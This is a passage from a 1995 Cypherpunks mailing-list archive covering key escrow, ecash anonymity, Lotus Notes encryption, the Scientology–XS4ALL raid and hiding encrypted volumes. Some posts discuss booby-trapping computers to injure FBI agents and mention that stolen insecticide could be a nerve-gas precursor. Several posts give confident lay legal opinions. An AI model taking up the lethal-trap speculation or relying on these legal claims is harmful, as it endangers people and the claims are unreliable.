privacy is not infringed by these technologies. There's nothing in here that specifically excludes dividing your keys among multiple escrow agents; I assume this is still an open issue still, or that it goes without saying (one way or the other). #3 and #6 make it impossible to prevent LE from reading messages from before or after their legally authorized window. This is clearly broken. Again, this appears to be trying to put all the power in the hands of LE to the detriment of the people. It's advertized as a compromise, but I see nothing gained over Clipper I. The only differences appear to be that the escrow agent(s) may be private instead of government, and the algorithms may be something other than SKIPJACK as long as they are at least 16 bits weaker as well as being known algorithms. It also doesn't address the main problem with Clipper I: that it wouldn't work, since (like Clipper I) it will catch only crooks who are smart enough to encrypt but stupid enough to encrypt with a system they (should) know LE can read -- probably a null set. If, on the other hand, this is made mandatory for encrypted transmissions, it will create a new and unnecessary class of criminals, probably including myself (though I won't promise to break any laws at this point). This really burns me up. What do they think they're doing here? Am I missing a big piece of it? Jim Gillogly Hevensday, 14 Halimath S.R. 1995, 22:02 From tunny at Inference.COM Tue Sep 5 15:13:33 1995 From: tunny at Inference.COM (James A. Tunnicliffe) Date: Tue, 5 Sep 95 15:13:33 PDT Subject: VCRPLUS Huffman code Message-ID: <304CCA55@smtp-pc> >On Tue, 5 Sep 1995, Peter Trei wrote: > >> >> > Has anyone worked out the VCRPLUS code? >> > > > >> Code which implemented this partial crack was published on the net, >> and the VCR+ people got very upset about it - apparently they make > > I believe the code is in the cookbook archive at ftp.ee.ualberta.ca, >but when I just tried to confirm I got timeouts. > > Brian Among many other places, you can get this off my Web page, in: http://www.inference.com/~tunny/crypto/primer.html - Tunny ______________________________________________________________________ James A. Tunnicliffe | WWWeb: http://www.inference.com/~tunny Inference Corporation | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77 tunny at Inference.com | <--finger for key 36 07 D9 33 3D 32 53 9C ====================================================================== From hallam at w3.org Tue Sep 5 15:23:36 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 5 Sep 95 15:23:36 PDT Subject: SSLRef (SSLtelnet) In-Reply-To: <199509051940.VAA26244@utopia.hacktic.nl> Message-ID: <9509052222.AA31819@zorch.w3.org> >Is it possible that since this was only a "test" CA, that netscape used >less than a full-strength key? If it was only 512 bits or so, we could >try cracking it. Netscapes test cert is for a 1024 bit key Phill From jsimmons at goblin.punk.net Tue Sep 5 16:02:55 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Tue, 5 Sep 95 16:02:55 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: Message-ID: <199509052300.QAA21504@goblin.punk.net> > > > > Here's a prediction: within one year, we will see the advent of Micro$oft's > > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by > > Micro$oft itself, or a flat-out trap door. ANY communications with a > > Windoze box or network will have to use it, or loose the market. > Black Unicorn wrote: > > It's here already. > It's called "lotus notes." > So what form of GAK or trap-door does lotus notes contain? -- Jeff Simmons jsimmons at goblin.punk.net From skaplin at mirage.skypoint.com Tue Sep 5 16:04:54 1995 From: skaplin at mirage.skypoint.com (Sam Kaplin) Date: Tue, 5 Sep 95 16:04:54 PDT Subject: Police and scientology visit XS4ALL Amsterdam Message-ID: From: XS4ALL Internet Postbus 22864 1100 DJ Amsterdam tel: +31 20 6222885 fax: +31 20 6222753 PRESS RELEASE ------------- Police and members of Scientology church enter offices of XS4ALL ================================================================ Amsterdam - thuesday september 5, 1995. Today at about 14:00, XS4ALL was visited by Mr. S. Braan, bailiff. He was acting on behalf of the Religious Technology Centre, better known as the Scientology Church, or Scientology for short. He was assisted by a local police officer and Mr. Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology in The Netherlands. Also present were two computer experts (Mr. Ootjes and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and two American employees of Scientology, Mr. Weightman and Ms. Jenssen. Scientology is filing for seizure of XS4ALL's computer equipment. Under dutch law, this means that a bailiff comes in to record your assets. In real-life, the computer-experts that were present have recorded the types and serial numbers of all the computers in our offices. They did not take any equipment, the continuity of XS4ALL's services is not in jeopardy. What is this all about? ----------------------- The Scientology Church claims that the XS4ALL anonymous remailer was used to disseminate documents over the Internet to which the church holds the legal copyright. This has led the church to ask the president of the district court of Amsterdam to grant permission for this seizure as a prelude to legal procedures concerning damages suffered by the church. The remailer in question has been disabled more than 2 months ago. During the visit of Scientology to XS4ALL this afternoon, the remailer was not the subject of any conversation. The organisation seemed totally preoccupied with the information about Scientology that one of our users has put on his home page. Part of this information is said to be a file to which Scientology holds the copyright. If we were to delete the file in question on the spot, they were willing to drop the seizure. Responsability of Internet Providers ------------------------------------ XS4ALL categorically denies any responsability for contents of users' homepages. The users decide for themselves what is on their homepage. Since XS4ALL does not edit the homepages and has no mechanism of control over the contents we strongly feel that the users themselves are responsible for what they say on their homepage. This whole affair demonstrates the need for clarity concerning the legal postion of Internet Providers. We are shocked that our offices can be invaded bij freshly flown-in U.S. cult members. If we as Internet providers are held responsible for what our users say, that will undoubtebly kill freedom of speech on the net. Scare-tactics ------------- XS4ALL is not alone in receiving this kind of attention from Scientology. Scientology, a semi-religious multinational, is at war with a number of people on the Internet. A non-organized group of people on the net has started to openly discuss the activities of the church. Until recently, the church has always managed to supress critical voices by means of sheer intimidation and by engaging in endless legal battle. One of the people that Scientology has a problem with is 'fonss', an XS4ALL user that publishes the F.A.C.T.-net Kit on his home page (http://www.xs4all.nl/~fonss). This kit (which can be found on numerous homepages all over the Internet) consists of a large number of documents that show the true face of Scientology. One of these documents is a piece to which Scientology supposedly holds the copyright and which has been added to the kit without the church's permission. Additional information can be found on the Internet: http://www.cybercom.net/~rnewman/scientology/home.html http://www.xs4all.nl/~fonss news:alt.religion.scientology news:alt.censorship news:alt.clearing.technology From hfinney at shell.portal.com Tue Sep 5 16:11:53 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 5 Sep 95 16:11:53 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: <199509052310.QAA10027@jobe.shell.portal.com> From: shamrock at netcom.com (Lucky Green) > This is unnecessary, since there is no "true" ecash. DigiCash's ecash in > its current form, the only version David Chaum is willing to licenese, is > fully traceable. Popular Cypherpunk's myths nonwithstanding. > > First, the recipient of funds is non-anonymous by design. Second, any payer > can trivialy make the recipient of a ecash note known by revealing the > blinding factor. For purposed of lawenforcement, DigiCash's ecash in no > more secure than if the (insert horseman here) billed his fees to a credit > card. This is not completely correct; there is a degree of anonymity in DigiCash's ecash. That is anonymity of how a person spends his money. Neither the bank nor the payor is in a position to learn who or where a particular piece of ecash comes from (assuming that anonymous communication means are used). This is not trivial anonymity. IMO the greatest privacy threat posed by credit cards is exactly this, the tracking of spending information and patterns. With credit card payments a great deal of information can be learned by the credit card company about what I do. With ecash almost no information is learned, only the raw amounts I spend. And if I occasionally make payments to myself even that is blurred. Ecash is not all that we might hope it could be but it is more than a myth that it allows untraceable transactions. Hal From unicorn at access.digex.net Tue Sep 5 16:13:55 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 5 Sep 95 16:13:55 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509052300.QAA21504@goblin.punk.net> Message-ID: On Tue, 5 Sep 1995, Jeff Simmons wrote: > Date: Tue, 5 Sep 1995 16:00:38 -0700 (PDT) > From: Jeff Simmons > To: cypherpunks at toad.com > Subject: Re: NSA says Joe Sixpack won't buy crypto > > > > > > > Here's a prediction: within one year, we will see the advent of Micro$oft's > > > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by > > > Micro$oft itself, or a flat-out trap door. ANY communications with a > > > Windoze box or network will have to use it, or loose the market. > > > Black Unicorn wrote: > > > > It's here already. > > It's called "lotus notes." > > > So what form of GAK or trap-door does lotus notes contain? No, it's just been so weak before the current implementation of RC4 (and note the export version still has 40 bits) that it might as well be nothing. > > -- > Jeff Simmons jsimmons at goblin.punk.net > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From anon-remailer at utopia.hacktic.nl Tue Sep 5 17:25:23 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 5 Sep 95 17:25:23 PDT Subject: Secure Device 1.4 QuestionSecure Device 1.4 Question Message-ID: <199509060025.CAA05098@utopia.hacktic.nl> I just installed Secure Device, v1.4 on a PC at work. After installing it, I looked at the encrypted volume and found the string "SECDEV " starting at the fourth byte of the file. I'd prefer that this file look like some temporary file that got left on the disk by a program that didn't clean up properly after itself, and not be identifiable as an encrypted volume. Is there a way to get Secure Device to not leave identifiable plaintext like that in the file? Will I do any harm to the file if I replace that string with blanks, or something more innocuous? If it's required to be there, then I'd like to put its removal on the "wish list" for the next version. (I copied the file, replaced the string "SECDEV" with blanks using a hex editor, and then mounted the copy as an encrypted volume, and it seems to be working OK, but I wanted to make sure this won't cause unforseen problems in the future.) As you've probably guessed, I'm not supposed to have any personal files on my work computer, and an entire encrypted volume would undoubtedly make someone go ballistic if they discovered it. When I want to use my encrypted file system, I reboot off of a floppy, and all Secure Device programs and drivers are kept on the floppy. The only thing that has to be left on the hard drive is the encrypted volume itself. Please post a copy of any replies to the Cypherpunks mailing list at "cypherpunks at toad.com". Thanks. From mfroomki at umiami.ir.miami.edu Tue Sep 5 17:27:53 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Tue, 5 Sep 95 17:27:53 PDT Subject: Emergency File Wipe Algorithim In-Reply-To: <9509052120.AA02633@ch1d157nwk> Message-ID: On Tue, 5 Sep 1995, Andrew Loewenstern wrote: [...]> > BTW, this is not a troll and I know that the possible constitutionality of > court-ordered disclosure of passphrases or key-material has been hashed over > many times in the past here, but have any cases with this particular > attribute gone through court yet? There were reports even years ago of AFAIK no reported cases. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From stevenw at iglou.com Tue Sep 5 18:16:49 1995 From: stevenw at iglou.com (Steven Weller) Date: Tue, 5 Sep 95 18:16:49 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: > Black Unicorn posted a very interesting info summary on the > subject of foreign state US$$ forgery. > >This is a story I heard, long ago, from a Brit, Mr Waterlow, >about something that happened to his grandfather, chairman >of the Waterlow bank: > >Early in this century Portugal didn't print it's own money but >contracted this job to the Waterlow Bank in England. Some >skilled conmen succeeded in making the bank beleive they were >representatives of the Portugeese National Bank. Then they >ordered a huge amount of new bills and got away (at least >for some time) with it. Tis all in a book: "The Man Who Stole Portugal". I picked it up for about $2 in a bookstore a few months ago. Very much worth a read. An incredibly audacious escapade. ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more | than just a place to find pictures Windsor Consulting Group | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From wilcoxb at nagina.cs.colorado.edu Tue Sep 5 18:32:19 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Tue, 5 Sep 95 18:32:19 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: Message-ID: <199509060132.TAA04511@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Lucky Green wrote: > > This is unnecessary, since there is no "true" ecash. DigiCash's ecash in > its current form, the only version David Chaum is willing to licenese, is > fully traceable. Popular Cypherpunk's myths nonwithstanding. > > First, the recipient of funds is non-anonymous by design. Second, any payer > can trivialy make the recipient of a ecash note known by revealing the > blinding factor. For purposed of lawenforcement, DigiCash's ecash in no > more secure than if the (insert horseman here) billed his fees to a credit > card. I'm sorry-- what do you mean by "the recipient of funds is non-anonymous"? I cannot envision any centralized currency system in which a user's funds were *not* known to the bank! Secondly, there is a tremendous difference between a person being able to identify you as the recipient of their money (which they can pretty much do anyway, with less surety, just by saying "That's him! He's the one I gave it to!") and a third party such as the bank or a government being able to monitor all your transactions. For such an organization to perform that feat on a DigiCash user they would need the cooperation of all of the people with whom he exchanges currency, and if they have that, then cryptography seems irrelevant. :-) I hope I'm not missing anything here. Regards, Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQCVAwUBMEz5/vWZSllhfG25AQEVsAQAo27grJhSgGV6iO2vIMILiBiib33/Z/73 Fzj5jgGVgqnlJ73UjHrInSas0p7wdKUf+PeLEtSc4xkMnOPvr3gsT34YAOvO6rcR DsKwE7mnxK6hmxZl2UkUJ/dhZql5wbT2im27/RC+N2wgaGbahedpJfdjj+QPP06h uEPTjvT7Yco= =hDCy -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Sep 5 18:55:45 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 18:55:45 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: <199509060153.VAA14379@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509052310.QAA10027 at jobe.shell.portal.com>, hfinney at shell.portal.com (Hal) wrote: >This is not completely correct; there is a degree of anonymity in >DigiCash's ecash. That is anonymity of how a person spends his money. >Neither the bank nor the payor is in a position to learn who or where a >particular piece of ecash comes from (assuming that anonymous >communication means are used). So it is harder to compile dosiers on people. Big deal. The recipient can still determine who gets the goods paied for by the "anonymous" ecash by conventional means (hint: shipping address), so the payee anonymity is of little value as far as protecting the privacy of the payer (most likely the recipient of the goods) is concerened. Ecash of course is of *no* value for the various assasination markets, drug dealing, money laundring, etc that routinely get mentioned in the same paragraph as Ecash. The reason is the *full traceability* of the payee that has been deliberately built into the current version of Ecash. A "feature" that you may rest assured will be part of all future versions backed by anyone with even marginal reputation in the financial markets. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMEz/CyoZzwIn1bdtAQErdwGA3TrIYF5+O1EOQ+qdCyZRo8ePJnxmAAAl EeES8xBtWDBFwqUXTFRbj1hqLv9kwQ6K =7w8Q -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Sep 5 18:57:30 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 18:57:30 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: At 23:09 9/5/95, announce wrote: [...] > Police and members of Scientology church enter offices of XS4ALL > ================================================================ I am wondering about the legalities of booby trapped computer equipment. Would it be legal if a clear warning to the fact was posted on the hardware? Interesting side note: a few months ago, several hundred 5 gallon containers of insecticide were stolen from the lot of an agricultural supply dealer here in California. The incident made a small note in the SF Chronicle. It was mentioned that the FBI is taking part in the investigation. What wasn't mentioned was that this insecticide is an ideal precursor to various forms of neuro toxins, namely Tabun and Soman, two types of nerve gas so vicious and toxic that even Hitler refused to approve their use. I predict that eventful times are just around the corner. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 18:57:33 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 18:57:33 PDT Subject: Emergency File Wipe Algorithim Message-ID: At 15:47 9/5/95, Sameer R Manek wrote: >> May I also point out that the rules of economics do not apply to the >> federal government, since it insitsts - quite successfully - on having a >> monopoly on using lethal force to extract arbitrarily large amounts from >> hundreds of millions of working Americans? > >How do you figure the above? You only get to go to jail if you don't >pay taxes...then you can't pick up the soap. If aren't willing to pay your taxes, which by the way are nothing but forced labor for a large part of the year, it is unlikely that you are willing to spend the same or more forced time maufactoring license plates. If your resist that kidnapping and introduction into a slave labor camp that follows a "conviction" for not paying your taxes you will be forced to comply. If you then resist that force you will be killed. Chisel it in granite: the ultimate threat by which any government compels compliance is _always_ lethal force. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 18:58:05 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 18:58:05 PDT Subject: Another Son of Clipper discussion paper Message-ID: At 16:36 9/5/95, Mike McNally wrote: >If the algorithm is public (and to stretch a point, if the executable >makes it onto somebody's hard disk, it's effectively public), I don't >really understand how the above can be made a realistic goal. Windows 95 is on a lot of people's hard drives. It is therefore public and available for every one's inspection. How many people do you know that have reverse engineered Windows 95. How many of those use a reverse engineered version. I'd venture it is zero out of zero. -- Lucky Green PGP encrypted mail preferred. From Tweetpunk at aol.com Tue Sep 5 19:14:05 1995 From: Tweetpunk at aol.com (Tweetpunk at aol.com) Date: Tue, 5 Sep 95 19:14:05 PDT Subject: Key Certification by US Post Office Message-ID: <950905221353_11856933@mail02.mail.aol.com> Copious apologies if this is old news, but I just got a chance to read some mags from the last few weeks: An article in *The Economist* (August 5th-11th 1995 p56) reports that the United States Postal Service has plans to offer *electronic certificates of identity encoded to prevent forgery* It goes on to say that they are working with the usual suspects (Microsoft and Lotus/IBM) to get appropriate software included in their products. Future services include timestamping, multimedia kiosks in post office lobbies and e-mail print out and delivery services (for the connectivity challenged). I guess this puts a new twist on saying that PGP is an envelope for your e-mail. ------- Greg Anders tweetpunk at aol.com To have loved and lost liked Patsy Cline, it is better to have never loved at all. From pfarrell at netcom.com Tue Sep 5 19:33:24 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Tue, 5 Sep 95 19:33:24 PDT Subject: NSA says Joe Sixpack won't buy crypto Message-ID: <80607.pfarrell@netcom.com> Black Unicorn writes: > On Tue, 5 Sep 1995, Jeff Simmons wrote: >> So what form of GAK or trap-doorodoes lotus notes contain? > No, it's just been so weak before the current implementation of RC4 (and > note the export version still has 40 bits) that it might as well be > nothing. Uni is right. Notes used RSA, which starts out fine. but it has nothing like PGP's passphrase to protect the private key. You can simply copy the "username.ID" file, and you can sign and encrypt messages with "username"'s nym. Of course, Corporate america loves Notes, which is why IBM bought it. Weak encryption for weak minds. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Tue Sep 5 20:17:51 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Sep 95 20:17:51 PDT Subject: Lotus Notes vs. the Web and the Net Message-ID: At 2:23 AM 9/6/95, Pat Farrell wrote: >Of course, Corporate america loves Notes, which is why IBM bought it. > >Weak encryption for weak minds. It may also signal that Lotus Notes has peaked, as IBM has a knack for "buying at the top." Interestingly, the current issue of "Wired" (morphed Aryanized OJ) says that Lotus Notes is tired, and Web-based groupware is wired. On this one I agree...and I've said this here on this list. Local groups, such as university departments, corporate departments, even entire corporations, can use the Web/Net in ways similar to what Lotus Notes provides (using their own LANs, or even the Internet, with suitable security steps). Granted, Lotus Notes currently has more stuff oriented towards groupware (from what I've been reading for several years, as I'm not a user), but I'd expect a huge amount of work on Netscape and similar browsers, and other Net systems, will make the Web/Net a more common groupware platform. I don't know this is so, but this is where I'd bet money. No way would I pay $3 billion for Lotus Notes! --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Tue Sep 5 20:38:15 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Sep 95 20:38:15 PDT Subject: Are booby-trapped computers legal? Message-ID: (I've changed the name of this thread.) At 2:30 AM 9/6/95, Lucky Green wrote: >I am wondering about the legalities of booby trapped computer equipment. >Would it be legal if a clear warning to the fact was posted on the >hardware? There are two types of "booby traps" to consider: * Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and when a burglar enters. Or an electrified region of a room is set to "get energized" when an intruder enters. These are "surprises" and are canonical booby traps. These have been found to be illegal in several court cases. (I'm not a lawyer, but I've been reading about them for 20 years. Famous cases where a burglar sued, and won, because he was injured when breaking into a house.) * Type 2 Booby Trap: electrified perimeter fences. So long as these are adequately marked ("If you touch this fence, you will probably die"), and are not public nuisances where children and pets will inadvertently validate Darwin's theory, these are--I think--legal. There may be license fees required, to build an electrified fence, but I think it is possible to build a lethal voltage electrified fence on one's property. Thus, I suspect it is fully legal to build an electrified fence around one's PC, providing suitable warnings are included. I would not call the second type a real booby trap, though some courts might, depending. A properly labelled electrified fence seems legal, on one's own property, but may not be. And certainly I think any explosive-rigged system is illegal, for explosives reasons if not for booby trap reasons. I know of no case law on this, and suspect that if an FBI agent were to be electrocuted or blown up upon trying to open/use/disconnect the PC, even with clear warnings, that a prosecution would happen. Results are unclear (to me). (I think that if an FBI agent were to be electrocuted while climbing on a clearly labelled electrified fence, no prosecution would result.) Of course, if a PC were to be clearly labelled as being rigged, then steps could presumably be taken to defuse the arrangement. >Interesting side note: a few months ago, several hundred 5 gallon >containers of insecticide were stolen from the lot of an agricultural >supply dealer here in California. The incident made a small note in the SF >Chronicle. It was mentioned that the FBI is taking part in the >investigation. > >What wasn't mentioned was that this insecticide is an ideal precursor to >various forms of neuro toxins, namely Tabun and Soman, two types of nerve >gas so vicious and toxic that even Hitler refused to approve their use. I >predict that eventful times are just around the corner. As Lucky knows, I live out in the country. I agree that some "muckers" (R.I.P. John Brunner) are likely to mount assaults on urban centers. Bad news for some. But then the good news is that the threat of nuclear annihilation has all but gone away completely, and that cancels out an awful lot of the minor bad news items the scribblers keep telling us are so awful. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From shamrock at netcom.com Tue Sep 5 20:47:45 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 20:47:45 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: At 19:32 9/5/95, Bryce Wilcox wrote: >I hope I'm not missing anything here. Only that Ecash has no benefits for transactions that are of an illegal nature. The meaning of "illegal" is of course increasing as new laws are passed every session of the legislature. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 20:48:03 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 20:48:03 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: With every session of Congress, previously legal acts become illegal. Has anyone worked out a function of this growth (number of crimes in the books vs. time)? I am not looking at the numbers of laws passed, but at individual acts that are defined to be illegal. If this has been studied, what is the formula? If anyone with access to more appropriate lists could please give me a pointer/forward the post there, I'd be grateful. TIA, -- Lucky Green PGP encrypted mail preferred. From unicorn at access.digex.net Tue Sep 5 20:57:27 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 5 Sep 95 20:57:27 PDT Subject: Growth of actions definded as crime. Which math formula? In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Lucky Green wrote: > Date: Tue, 5 Sep 1995 20:50:44 -0800 > From: Lucky Green > To: cypherpunks at toad.com > Subject: Growth of actions definded as crime. Which math formula? > > With every session of Congress, previously legal acts become illegal. Has > anyone worked out a function of this growth (number of crimes in the books > vs. time)? I am not looking at the numbers of laws passed, but at > individual acts that are defined to be illegal. If this has been studied, > what is the formula? If anyone with access to more appropriate lists could > please give me a pointer/forward the post there, I'd be grateful. > > TIA, > > -- Lucky Green > PGP encrypted mail preferred. Really it's hard to answer this because what constitutes a "NEW" act is a real question in and of itself. For example, wire fraud. Is it a "NEW" crime? Or just a subset of fraud, or mail fraud? Carjacking... is that a new offense? Or just a solidification and increase of punishment for armed robbery unauthorized use of a motor vehicle, possession of stolen property, and grand theft auto? Check forgery now has it's own offense, but is this distinct from forgery? Most "new offensives" are simply re-classifications of old offenses or efforts to move them into the federal arena. I think the conception that entirely new acts are often made illegal (excepting burning the flag or some such) is an erronious one. --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From alt at iquest.net Tue Sep 5 21:12:02 1995 From: alt at iquest.net (Al Thompson) Date: Tue, 5 Sep 95 21:12:02 PDT Subject: SUMMARY: Not-so-volatile volatile memory Message-ID: At 11:54 AM 9/5/95 +0200, Anonymous wrote: > >Is this a new discovery? When I used to work with DOD classified >data, not so long ago, disk drives had to be declassified using an >approved program, such as Norton Utilities' "WIPEINFO". (That was >approved up through the SECRET/SAR level, anyway. I don't know >about TS/SCI/SI.) But those same regulations said that RAM was >considered declassified within a certain time (30 seconds, I think) >after power was removed. (That time figure was UNclassified, BTW.) >I think it was just to allow time for the voltage to bleed off of >the power supply's filter capacitors, and not related to the >relative volatility of DRAM. I worked at a DoD contractor for a while, and there was a DoD-approved method of disposing of hard drives, which was expensive, laborious, and rather silly. We just had two witnesses watch as we smashed it to smithereens (technical term) with a sledge hammer, and then handed the parts over to an approved disposal person (trash man). It's JUST that easy. From futplex at pseudonym.com Tue Sep 5 21:13:12 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 5 Sep 95 21:13:12 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: <199509060153.VAA14379@book.hks.net> Message-ID: <9509060413.AA00437@cs.umass.edu> Lucky Green writes: > The recipient can > still determine who gets the goods paied for by the "anonymous" ecash by > conventional means (hint: shipping address), ...unless the goods are data. -Futplex mailto:futplex at pseudonym.com From ravage at einstein.ssz.com Tue Sep 5 21:14:42 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 5 Sep 95 21:14:42 PDT Subject: Are booby-trapped computers legal? In-Reply-To: Message-ID: <199509060419.XAA04296@einstein.ssz.com> > > There are two types of "booby traps" to consider: > > * Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and > when a burglar enters. Or an electrified region of a room is set to "get > energized" when an intruder enters. These are "surprises" and are canonical > booby traps. > > These have been found to be illegal in several court cases. (I'm not a > lawyer, but I've been reading about them for 20 years. Famous cases where a > burglar sued, and won, because he was injured when breaking into a house.) > These are completely illegal in Texas and Florida for shure. To make such devices legal the state legal system has to equate property value to parity with life. See below for further comment on this. > * Type 2 Booby Trap: electrified perimeter fences. So long as these are > adequately marked ("If you touch this fence, you will probably die"), and > are not public nuisances where children and pets will inadvertently > validate Darwin's theory, these are--I think--legal. There may be license > fees required, to build an electrified fence, but I think it is possible to > build a lethal voltage electrified fence on one's property. > > Thus, I suspect it is fully legal to build an electrified fence around > one's PC, providing suitable warnings are included. > As far as I know the owner of property has no legal right to kill a person either traspassing or stealing it in any of the 50 states. There was a recent federal ruling that basicly says that if you meet a burglar in your home at nite you can not kill or otherwise harm them unless you're life is directly threatened. In short, you MUST give up the ground if at all possible. Federal and all 50 states (as far as I have been able to determine) rule human life to have a inherantly higher value than property of any type (this does not apply to government institutions). In Texas and all other cattle states that I am aware of, there are specific laws that limit how much voltage and current capacity an electrified fence can have. These laws specificaly prohibit any form of lethal installation. There is no license required nor do you have to mark the fences as electrified. To address the issue of premeditation in regards to this sort of system, does attempted murder ring any bells? If the officer(s) have warrents (and it is not up to the accussed to decide that issue at any time) and you refuse to assist them you are guilty of a crime (justifiably so). > I would not call the second type a real booby trap, though some courts > might, depending. A properly labelled electrified fence seems legal, on > one's own property, but may not be. And certainly I think any > explosive-rigged system is illegal, for explosives reasons if not for booby > trap reasons. > I don't know what you call it but if nothing else it is ethicaly and moraly reprehinsible. > I know of no case law on this, and suspect that if an FBI agent were to be > electrocuted or blown up upon trying to open/use/disconnect the PC, even > with clear warnings, that a prosecution would happen. Results are unclear > (to me). > > (I think that if an FBI agent were to be electrocuted while climbing on a > clearly labelled electrified fence, no prosecution would result.) > Of course not, the FBI as SOP turn the electricity, water, etc. off prior to assaults. In either case the person responsible for the electrification would find themselves in court facing some nasty charges. The law does not recognize the awareness of the victim in these types of cases. It in general falls to the owner/operator to inshure safe operating conditions. In the case off electrification this would mean current limiting on the power supply such that no permanent damage would result to the hapless. From frissell at panix.com Tue Sep 5 21:29:06 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 5 Sep 95 21:29:06 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Lucky Green wrote: > I am wondering about the legalities of booby trapped computer equipment. > Would it be legal if a clear warning to the fact was posted on the > hardware? Generally not. If you can kill the cops anyway (legally, I mean) you might get away with it but remember, Kunstler is dead now so getting a good defense might be tough. DCF From tcmay at got.net Tue Sep 5 21:31:51 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Sep 95 21:31:51 PDT Subject: Are booby-trapped computers legal? Message-ID: At 4:19 AM 9/6/95, Jim Choate wrote: >> Thus, I suspect it is fully legal to build an electrified fence around >> one's PC, providing suitable warnings are included. >> > >As far as I know the owner of property has no legal right to kill a person >either traspassing or stealing it in any of the 50 states. There was a >recent federal ruling that basicly says that if you meet a burglar in your >home at nite you can not kill or otherwise harm them unless you're life is >directly threatened. In short, you MUST give up the ground if at all >possible. Federal and all 50 states (as far as I have been able to >determine) rule human life to have a inherantly higher value than property >of any type (this does not apply to government institutions). Well, I wasn't saying one had a legal right to kill a person either trespassing or stealing, I was saying that electrified fences carrying lethal voltages are extant. How they got that way, and what licenses are involved, is unknown to me. But they do exist. >In Texas and all other cattle states that I am aware of, there are specific >laws that limit how much voltage and current capacity an electrified fence >can have. These laws specificaly prohibit any form of lethal installation. >There is no license required nor do you have to mark the fences as electrified. Cattle fences are not what I was talking about. 